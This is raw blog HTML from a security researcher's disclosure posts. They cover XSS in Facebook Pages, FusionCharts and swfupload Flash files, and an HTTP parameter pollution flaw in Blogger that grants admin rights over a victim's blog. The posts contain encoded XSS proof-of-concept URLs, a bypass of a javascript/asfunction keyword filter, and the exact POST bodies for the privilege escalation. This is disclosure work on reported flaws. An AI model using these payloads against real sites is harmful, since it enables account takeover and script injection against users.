<div style="direction: ltr;"></div><div class="separator" style="clear: both; text-align: center;"><span style="font-family: arial,sans-serif; font-size: 13px;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWsX5nLv1Ncd5DI7CM5mPA1vBWUOJLWm3UduELt9LpRLm_fTKQvOFl3vgW3OWZc7Jbat8e-bmrbhseQCifqc-syp9SOCJeBKfzu4rIg-WdR_UX7LULwvBNz_Z7nS96YSi8UDazLj0TO0Q/s1600/pagenameblocked.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWsX5nLv1Ncd5DI7CM5mPA1vBWUOJLWm3UduELt9LpRLm_fTKQvOFl3vgW3OWZc7Jbat8e-bmrbhseQCifqc-syp9SOCJeBKfzu4rIg-WdR_UX7LULwvBNz_Z7nS96YSi8UDazLj0TO0Q/s320/pagenameblocked.jpg" width="320" /></a></span></div><div style="direction: ltr;"></div><div style="direction: ltr;"></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;"> (I'm "sure" there might be a bypass, I didn't spend time to test it yet).<b> </b></span><br />
<br />
<span style="font-family: arial,sans-serif; font-size: 13px;"><b>1.</b> I was able to use another feature in order to bypass the protection and therefor change the page title name by using Facebook Api for Updating Page Attributes (<a href="https://developers.facebook.com/docs/reference/api/page/#page_access_tokens" target="_blank">https://developers.facebook.<wbr></wbr>com/docs/reference/api/page/#<wbr></wbr>page_access_tokens</a>), (The Pages API is just a Hint :)),</span></div><span style="font-family: arial,sans-serif; font-size: 13px;"> </span><br />
<span style="font-family: arial,sans-serif; font-size: 13px;">In this case, I changed my Page Title name to "malicious" javascript payload (<img src="xx.jpg"onerror=alert(6)>)<wbr></wbr>,</span><br />
<span style="font-family: arial,sans-serif; font-size: 13px;"> </span><br />
<div style="direction: ltr;"><span style="font-family: arial, sans-serif;"><br />
</span></div><div style="direction: ltr;"><b><span style="font-family: arial,sans-serif; font-size: 13px;">2.</span></b><span style="font-family: arial,sans-serif; font-size: 13px;"> In Facebook Pages, You can Add Application to your Page by using Adding To A Page Box:</span></div><span style="font-family: arial,sans-serif; font-size: 13px;"> </span><br />
<div style="direction: ltr;"></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;"> (<a href="https://www.facebook.com/add.php?api_key=xxx&pages=1&page=xxxx" target="_blank">https://www.facebook.com/add.<wbr></wbr>php?api_key=xxx&pages=1&page=<wbr></wbr>xxxx</a>)</span><br />
<br />
</div><div style="direction: ltr;"></div><div style="direction: ltr;"></div><div class="separator" style="clear: both; text-align: center;"><span style="font-family: arial,sans-serif; font-size: 13px;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgW0BKBG_DXZF8k7o36jgqauk7-eaVrksR6Jk11jdhcVEu1AtERxCw48rcncrHexLw-CxY4fYGT87UWVECzQGppqdac5ZdzUUptk8DvnQkDqBVrufvySlIXv6dnzlIz5t5Rd4m1oUGtkaM/s1600/addpage.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgW0BKBG_DXZF8k7o36jgqauk7-eaVrksR6Jk11jdhcVEu1AtERxCw48rcncrHexLw-CxY4fYGT87UWVECzQGppqdac5ZdzUUptk8DvnQkDqBVrufvySlIXv6dnzlIz5t5Rd4m1oUGtkaM/s320/addpage.jpg" width="320" /></a></span></div><div style="direction: ltr;"></div><br />
<div style="direction: ltr;"><span style="font-family: arial, sans-serif;"><br />
</span></div><span style="font-family: arial,sans-serif; font-size: 13px;"></span><br />
<div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">When you add a tab to your page, Facebook will display which pages you own/manage by the title of each page,</span></div><span style="font-family: arial,sans-serif; font-size: 13px;"> </span><br />
<div style="direction: ltr;"><span style="font-family: arial, sans-serif;"></span><span style="font-family: arial,sans-serif; font-size: 13px;">As a result of that situation I was able to execute a Stored XSS, (Facebook didn't filter the Page Title Name),</span></div><div style="direction: ltr;"></div><span style="font-family: arial,sans-serif; font-size: 13px;"> </span><br />
<div style="direction: ltr;"></div><div class="separator" style="clear: both; text-align: center;"><span style="font-family: arial,sans-serif; font-size: 13px;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4ZsYowMxBHHP8cHNGaDvLY1S60Mycj-Ovmt-PCt3WNqtFm1vk3kiKOJK1KlDDAeoUudYgmJRwhuW0cLlVsaMs6nzR6J4nqCWToavm4bE1uLGf9Ll8lq_ZIsbeXecYIPYq-gkZE5XXKuk/s1600/facebookpagetabxss.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4ZsYowMxBHHP8cHNGaDvLY1S60Mycj-Ovmt-PCt3WNqtFm1vk3kiKOJK1KlDDAeoUudYgmJRwhuW0cLlVsaMs6nzR6J4nqCWToavm4bE1uLGf9Ll8lq_ZIsbeXecYIPYq-gkZE5XXKuk/s320/facebookpagetabxss.jpg" width="320" /></a></span></div><div style="direction: ltr;"></div><br />
<div style="direction: ltr;"><span style="font-family: arial, sans-serif;"><br />
</span></div><span style="font-family: arial,sans-serif; font-size: 13px;"></span><br />
<div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">Now it seems to be only a Self Stored XSS, although In Facebook Pages You can use the Admin Roles Settings to add admins to your Page.</span></div><span style="font-family: arial,sans-serif; font-size: 13px;"> In this situation, I added the victim to be the administrator of my "malicious page", The victim didn't need to accept this admin request, it will be added automatically to my Page,</span><span style="font-family: arial,sans-serif; font-size: 13px;"> So now I was able to exploit this XSS By sending a Single link to the Victim</span><br />
<br />
<a href="https://www.facebook.com/add.php?api_key=124024574287414&pages=1&page=attackerpageid" target="_blank">https://www.facebook.com/add.<wbr></wbr>php?api_key=124024574287414&<wbr></wbr>pages=1&page=attackerpageid</a><a href="https://www.facebook.com/add.php?api_key=124024574287414&pages=1&page=attackerpageid" style="font-family: arial,sans-serif; font-size: 13px;" target="_blank"><br />
</a></div><div dir="rtl"><div style="direction: ltr;"><span style="font-family: arial, sans-serif;"><br />
</span></div><div style="direction: ltr;"><span style="font-family: arial, sans-serif;">PoC Image:</span></div><div style="direction: ltr;"><span style="font-family: arial, sans-serif;"><br />
</span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4ZsYowMxBHHP8cHNGaDvLY1S60Mycj-Ovmt-PCt3WNqtFm1vk3kiKOJK1KlDDAeoUudYgmJRwhuW0cLlVsaMs6nzR6J4nqCWToavm4bE1uLGf9Ll8lq_ZIsbeXecYIPYq-gkZE5XXKuk/s1600/facebookpagetabxss.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4ZsYowMxBHHP8cHNGaDvLY1S60Mycj-Ovmt-PCt3WNqtFm1vk3kiKOJK1KlDDAeoUudYgmJRwhuW0cLlVsaMs6nzR6J4nqCWToavm4bE1uLGf9Ll8lq_ZIsbeXecYIPYq-gkZE5XXKuk/s320/facebookpagetabxss.jpg" width="320" /></a></div><div style="direction: ltr;"><span style="font-family: arial, sans-serif;"><br />
</span></div><span style="font-family: arial,sans-serif; font-size: 13px;"></span><br />
<div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">PoC Video</span></div><span style="font-family: arial,sans-serif; font-size: 13px;"> </span><br />
<div style="direction: ltr;"></div><div class="separator" style="clear: both; text-align: center;"><span style="font-family: arial,sans-serif; font-size: 13px;"><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/n6cXSFJ7LcA?feature=player_embedded' frameborder='0'></iframe></span></div><div style="direction: ltr;"></div><div style="direction: ltr;"><span style="font-family: arial, sans-serif;"> </span></div><div style="direction: ltr;"><span style="font-family: arial, sans-serif;"> </span></div><span style="font-family: arial,sans-serif; font-size: 13px;"></span> <div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">Regards,</span></div><span style="font-family: arial,sans-serif; font-size: 13px;"> </span> <div style="direction: ltr;"><span style="font-family: arial, sans-serif;"> </span></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">Nir</span></div></div></div>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-1025468663370994513.post-30986217799985516492013-01-01T07:14:00.002-08:002013-01-14T05:47:52.486-08:00FusionChart 2013 Flash New Attacking Vectors<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: left;">
My Findings about FusionCharts Vulnerabilites:</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtbMOkTA_XcaO9ptT9ZBOt2qhG6PO3e83MZ2LQ6JoZQJ_4lcVwEtYuGv_i9L7D8TMiaGAwwtByT092ULTHM4lLMgKeJi-rz62i3ScgsWnOj1FAiC7vDJpJvmMsPTyvRI13phK4XS4HqCw/s1600/fusioncharts-xt-banner.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="93" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtbMOkTA_XcaO9ptT9ZBOt2qhG6PO3e83MZ2LQ6JoZQJ_4lcVwEtYuGv_i9L7D8TMiaGAwwtByT092ULTHM4lLMgKeJi-rz62i3ScgsWnOj1FAiC7vDJpJvmMsPTyvRI13phK4XS4HqCw/s320/fusioncharts-xt-banner.jpg" width="320" /></a></div>
<div style="text-align: left;">
<br /></div>
<br /><span style="color: #666666;">A)</span> I found that an attacker is able to execute a XSS attacks by loading a external XML File via dataUrl Parameter,<br /><br />This Parameter looking for a valid configuration fie for display Graph Data in FusionChart,<br /><br />In this case, An attacker is able to use the link parameter (http://docs.fusioncharts.com/charts/contents/DrillDown/LinkFormat.html) to execute javascript payloads on the client<br />for example (Click the Graph For XSS PoC):<br /><br />http://nirgoldshlager.site50.net/Column3D.swf?dataURL=http://files.nirgoldshlager.com/Data.xml<br /><br />When the victim will click on the malicious graph, The XSS Payload will be run on his client,<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaBAQgegKpQp6Z-hdYtt2_zelzAXStkW-GlOHcoJuLQnLA6hKw2MGOdnmVwGd-bUWJKSalIBpzklrfxAbYW3MNbD0ERk7sQEJnA1TIz1Uai_OcWW6RvgN7oVTZA48xYhI4gkWxc83fE84/s1600/ClicforXSS.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaBAQgegKpQp6Z-hdYtt2_zelzAXStkW-GlOHcoJuLQnLA6hKw2MGOdnmVwGd-bUWJKSalIBpzklrfxAbYW3MNbD0ERk7sQEJnA1TIz1Uai_OcWW6RvgN7oVTZA48xYhI4gkWxc83fE84/s320/ClicforXSS.jpg" width="320" /></a></div>
<div>
<br /><br /><span style="color: #666666;">B)</span> An attacker is able to perform redirection attack (New Tab) in Firefox, This can be done by using the LogoURL Parameter,<br /><br />This Parameter allow to attacker loading a external swf file (swf),<br />To perform a Redirection attack, The attacker will use the req.send function in ActionScript and use his malicious swf file,<br /><br />Req.send function:<br />(req.send("http://nirgoldshlager.com", "_blank", "GET");),<br /><br /><b>PoC:</b><br /><br /><a href="http://nirgoldshlager.site50.net/Column3D.swf?dataURL=http://files.nirgoldshlager.com/Data.xml">http://nirgoldshlager.site50.net/Column3D.swf?dataURL=http://files.nirgoldshlager.com/Data.xml</a> <br /><br /><b>Solution:</b><br /><br />
Cross Domain Policy file:<br /><br />
http://www.adobe.com/devnet-docs/acrobatetk/tools/AppSec/CrossDomain_PolicyFile_Specification.pdf <br /><br />What about anti-XSS Regex action script?<br /><br /> We all remember the old debugmode=1 Bug in FusionChart Right :)?<br /><br />I have examined the fusionchart's action script and discovered they do perform a poor trial of blocking Cross site scripting attacks using regex to match dangerous XSS attempts<br /><br />FusionChart action-script is trying to block the Dataurl=XXX XSS Attack by using a poor regex that is only looking for javascript/asfunction keywords, don't let the colon ":" check to trick you ;) this check is only performed in case javascript/asfunction is detected.<br /><br /><br /><b>Line 126-128:</b><br /><br />function filterXSSChars(strURL)<br />{<br /> if (_isOnline == true && ((strURL.toLowerCase().indexOf("javascript") != -1 || strURL.toLowerCase().indexOf("asfunction") != -1) && (strURL.indexOf(":") != -1 || strURL.indexOf("%3A") != -1)))<br /><br />An attacker is able to bypass this regex easily in IE by using vbscript instead of javascript,</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4KN-vRlIwfrrJBrDclUGfWA4wNMnOjll50PgfjmiT8SwuPB6YGli2NQPyStdwvClLu2TGvyUJg4CGVqyMihfXmDs71q9OJvTrtx9tZm2ieGpzJYTDKrvelO8cjFBufTMIazB6HVu81tc/s1600/VBSCRIPT+XSS+POOR+REGEX.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4KN-vRlIwfrrJBrDclUGfWA4wNMnOjll50PgfjmiT8SwuPB6YGli2NQPyStdwvClLu2TGvyUJg4CGVqyMihfXmDs71q9OJvTrtx9tZm2ieGpzJYTDKrvelO8cjFBufTMIazB6HVu81tc/s320/VBSCRIPT+XSS+POOR+REGEX.jpg" width="320" /></a></div>
<div>
<br /><br /><br /><b>PoC:</b><br /><br /><a href="http://nirgoldshlager.site50.net/MSLinelatest.swf?debugMode=1&dataURL=%27%3E%3Ca%20href=%27vbscript:alert%286%29%27%3E%3Cfont%20size=%22100%22%20%3EClick%20Me%20For%20XSS%3C/font%3E%3C/a%3E%3C%3E">http://nirgoldshlager.site50.net/MSLinelatest.swf?debugMode=1&dataURL=%27%3E%3Ca%20href=%27vbscript:alert%286%29%27%3E%3Cfont%20size=%22100%22%20%3EClick%20Me%20For%20XSS%3C/font%3E%3C/a%3E%3C%3E</a><br /><br /><br />Also you can use data:text/html; to bypass it or mocha,livescript for older version in Netscape,<br /><br />The correct solution might be:<br /><br />asfunction|javascript|vbscript|data|mocha|livescript|feed|pcast (Thanks to @irsdl for the feed tip, And @Milad_Bahari for the pcast, (feed,pcast XSS Works on some older versions of Firefox)<br /><ol style="text-align: left;">
</ol>
<div style="text-align: left;">
<br /></div>
As discovered by security researcher "Ben Hayak"(@benhayak)<br />a new paramter(defaultDataFile) has been revealed which is vulnerable to new XSS Attack.<br /><br />There
is another parameter called defaultDataFile this parameter can be used
to trigger another XSS incase the DataURL parameter is protected/blocked<br /><br />Line 125:<br /><br />var _defaultDataFile = unescape(getFirstValue(rootAttr.defaultdatafile, "Data.xml"));<br /><br />We can use this parameter to execute a XSS attack,</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3B9GQuPQO7i1hmkfGEt45aM-DzOWu5kmgr1r5SsIECwqG-RbYYJY1L3ACoI7DtkK7hhag4_tgKPlkOffEtQaAp8IEQK57vMfS4Vws4PWPPiY7Q5xXMlqQCoEej-5MJk5m6ucfxI97rmI/s1600/BENISSUE.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3B9GQuPQO7i1hmkfGEt45aM-DzOWu5kmgr1r5SsIECwqG-RbYYJY1L3ACoI7DtkK7hhag4_tgKPlkOffEtQaAp8IEQK57vMfS4Vws4PWPPiY7Q5xXMlqQCoEej-5MJk5m6ucfxI97rmI/s320/BENISSUE.jpg" width="320" /></a></div>
<div>
<br /><br /><b>PoC:</b><br /><br /><a href="http://nirgoldshlager.site50.net/MSLinelatest.swf?debugMode=1&defaultDataFile=%27%3E%3Ca%20href=%27javascript:alert%286%29%27%3E%3Cfont%20size=%22100%22%20%3EClick%20Me%20For%20XSS%3C/font%3E%3C/a%3E%3C%3E">http://nirgoldshlager.site50.net/MSLinelatest.swf?debugMode=1&defaultDataFile=%27%3E%3Ca%20href=%27javascript:alert%286%29%27%3E%3Cfont%20size=%22100%22%20%3EClick%20Me%20For%20XSS%3C/font%3E%3C/a%3E%3C%3E</a><ol style="text-align: left;">
</ol>
</div>
</div>
Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-1025468663370994513.post-90275717826129993412012-12-09T13:50:00.000-08:002013-01-14T08:32:39.534-08:00swfupload.swf XSS<div dir="ltr" style="text-align: left;" trbidi="on">
Hi,<br />
<br />
Just want to share my finding,<br />
<br />
I found another XSS Vulnerability in swfupload.swf<br />
<br />
<br />
PoC:<br />
<br />
<a href="http://demo.swfupload.org/v220/swfupload/swfupload.swf?buttonText=%3Ca%20href=%22javascript:alert%28top.location%29%22%3EClick+For+XSS%20%3Cfont%20size=%2216%22%3E%3C/a%3E">http://demo.swfupload.org/v220/swfupload/swfupload.swf?buttonText=%3Ca%20href=%22javascript:alert%28top.location%29%22%3EClick+For+XSS%20%3Cfont%20size=%2216%22%3E%3C/a%3E</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRgEI-TW4if2LHzDJ7W_E1biYY-doO2gO9hZ-9Cm1pYJ24u7Um6jbRGaXzbXhWX8EkUeh6Z3aCjiBmRu_rjEyVcKlNbrlw9Vt1uIkOspFYHPdwMSEN8O0EUpMHBeookcroPoHrxx5hlU4/s1600/swfuploadxss.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRgEI-TW4if2LHzDJ7W_E1biYY-doO2gO9hZ-9Cm1pYJ24u7Um6jbRGaXzbXhWX8EkUeh6Z3aCjiBmRu_rjEyVcKlNbrlw9Vt1uIkOspFYHPdwMSEN8O0EUpMHBeookcroPoHrxx5hlU4/s320/swfuploadxss.jpg" width="320" /></a></div>
<br />
<br />
<br />
Vulnerable Parameter:<br />
<br />
buttonText<br />
<br />
Vulnerable Code:<br />
<br />
this.buttonTextField.htmlText = this.buttonText;<br />
<br />
<br />
<br />
(For Wordpress Fans, Works on Version 3.3.1 and below)<br />
<br />
<br />
Enjoy...</div>
Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-1025468663370994513.post-83572190878468793752012-06-13T06:21:00.004-07:002013-02-27T22:07:30.792-08:00<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Killing a bounty program, Twice (HITB 2012 Slides) by Nir Goldshlager, Itzhak (Zuk)<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="356" marginheight="0" marginwidth="0" mozallowfullscreen="" scrolling="no" src="http://www.slideshare.net/slideshow/embed_code/13295409" style="border-width: 1px 1px 0; border: 1px solid #CCC; margin-bottom: 5px;" webkitallowfullscreen="" width="427"> </iframe> <br />
<div style="margin-bottom: 5px;">
<b> <a href="http://www.slideshare.net/goldshlager19/nir-goldshlager-killing-a-bug-bounty-program-twice-hack-in-the-box-2012" target="_blank" title="Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012">Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012</a> </b> from <b><a href="http://www.slideshare.net/goldshlager19" target="_blank">Nir Goldshlager</a></b><br />
<b> </b> </div>
<b>1.</b><br />
<br />
Google Picnik File Inclusion (Shell on Google server), The Picnik is Over!<br />
<br />
<b>2.</b><br />
<br />
Google Affliate Network, Hijack any user account by permission vulnerability,<br />
<br />
<b>3.</b><br />
<br />
XSS in blogger.com<br />
<br />
<br />
<b>PoC Videos:</b><br />
<br />
<br />
<b>Google Books DOM XSS:</b><br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/VD3nMsAF1HY?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<br />
<br />
<b>Google Calender Stored XSS: </b><br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/2MtAQil9kKs?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<br />
<br />
<br />
<b>Google Analytics, Cool Stored XSS: </b><br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/2wyJOlTfmaA?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<br />
<br />
<br />
<b>Google Friend Connect Stored XSS: </b><br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/NZK43_OPuFI/0.jpg" height="266" width="320"><param name="movie" value="http://www.youtube.com/v/NZK43_OPuFI?version=3&f=user_uploads&c=google-webdrive-0&app=youtube_gdata" /><param name="bgcolor" value="#FFFFFF" /><param name="allowFullScreen" value="true" /><embed width="320" height="266" src="http://www.youtube.com/v/NZK43_OPuFI?version=3&f=user_uploads&c=google-webdrive-0&app=youtube_gdata" type="application/x-shockwave-flash" allowfullscreen="true"></embed></object></div>
<br />
<br />
<br />
<br />
<b>Google Knol, Access to privates docs using Google Knol Translator Tool: </b><br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/Tuv8ZYgNqp0?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<br />
<br />
<br />
<b>Google Feedburner Stored XSS:</b><br />
<br />
<br />
<br />
<br />
<b> </b>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/ShA6ojZHAOQ?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<br />
<br />
<br />
To Be Continue ;)
Enjoy....</div>
Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-1025468663370994513.post-1806810802455435322011-03-10T02:07:00.000-08:002013-04-04T21:56:59.025-07:00How I Hacked Any Blogger Account <div dir="ltr" style="text-align: left;" trbidi="on"><meta content='0;url=http://www.breaksec.com/?p=5691' http-equiv='refresh'/> <br />
Hi,<br />
<br />
This is my first post in my blog and also my first post regarding my security vulnerabilities findings in Google Reward Program,<br />
<br />
In the last 2 months, I participated in Google reward program and found some High, Serious vulnerabilities,<br />
<br />
(First, I want to mention that Google has the best professional, brilliant security team, It amazing how much Google care about security and do a amazing job to secure their sites, Thanks Adam, Google Security Team for giving me the chance to show my skills :))<br />
<br />
The vulnerability that I want to share first, Is a critical vulnerability in Blogger (Google Service),<br />
<br />
That vulnerability could be used by an attacker to get administrator privilege over any blogger account (Permission Issue),<br />
<br />
Yes I know it sound kind of crazy but it's true :),<br />
<br />
Here are the details regarding the issue in Blogger service,<br />
<br />
I found a HTTP Parameter Pollution vulnerability in Blogger that allow an attacker to add himself as an administrator on the victim's blogger account,<br />
<br />
Technical details:<br />
<br />
Here are the steps for getting admin control permissions over any blogger accounts.<br />
<br />
1.<br />
<br />
The attacker Use the invite author options in blogger (add authors):<br />
<br />
Vulnerability location:<br />
<br />
POST /add-authors.do HTTP/1.1<br />
Request:<br />
<br />
security_token=attackertoken&amp;blogID=attackerblogidvalue&amp;blogID=victimblogidvalue&amp;authorsList=goldshlager19test%40gmail.com(attacker email)&amp;ok=Invite<br />
As you can see I added two blogid value in my post request (blogID=attackerblogidvalue&amp;blogID=victimblogidvalue)<br />
<br />
<br />
The server checks the first blogid value and executes the second blogid value of the attacker<br />
<br />
<br />
2.<br />
<br />
After that the attacker receives a mail to confirm him as a author (author invitation link),<br />
After that, the attacker will be added as an author on the victim account.<br />
<br />
<br />
3.<br />
<br />
At this step it becomes possible to modify the attacker permission from an author to an administrator,<br />
Vulnerability Location:<br />
POST /team-member-modify.do HTTP/1.1<br />
Request:<br />
security_token=attackertoken&amp;blogID=attackerownblogid&amp;blogID=victimblogidvalue&amp;memberID=attackermemberid&amp;isAdmin=true&amp;ok=Grant+admin+privileges<br />
<br />
And?<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMqYXPQHslaUOvY1zluKaw7EJwMG0KmN6q9kQqCcrCfACuxkmzB28nmh3vpt0hAPycRxovTUGFGT4Km3QvXSfm9Rjz0Wl7KO5PS8IQ78L6iiKQTNA1-WeDkpM03ib3DliUfui335jqmYo/s1600/mario2gameover.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMqYXPQHslaUOvY1zluKaw7EJwMG0KmN6q9kQqCcrCfACuxkmzB28nmh3vpt0hAPycRxovTUGFGT4Km3QvXSfm9Rjz0Wl7KO5PS8IQ78L6iiKQTNA1-WeDkpM03ib3DliUfui335jqmYo/s320/mario2gameover.jpg" width="320" /></a></div><br />
<br />
<br />
<br />
PoC Video:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/AdIWl0gkynk?feature=player_embedded' frameborder='0'></iframe></div>
2.(Full Video Download): <a href="http://www.2shared.com/file/90mjfuab/Blogger_Get_Administrator_priv.html">http://www.2shared.com/file/90mjfuab/Blogger_Get_Administrator_priv.html</a> (The vulnerability mentioned here has been confirmed patched by the Google Security Team very fast.) Best Regards Nir.Goldshlager
<div></div></div>Unknownnoreply@blogger.com16